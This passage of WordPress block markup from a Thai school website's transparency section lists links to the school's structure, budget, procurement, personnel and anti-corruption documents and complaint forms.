900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 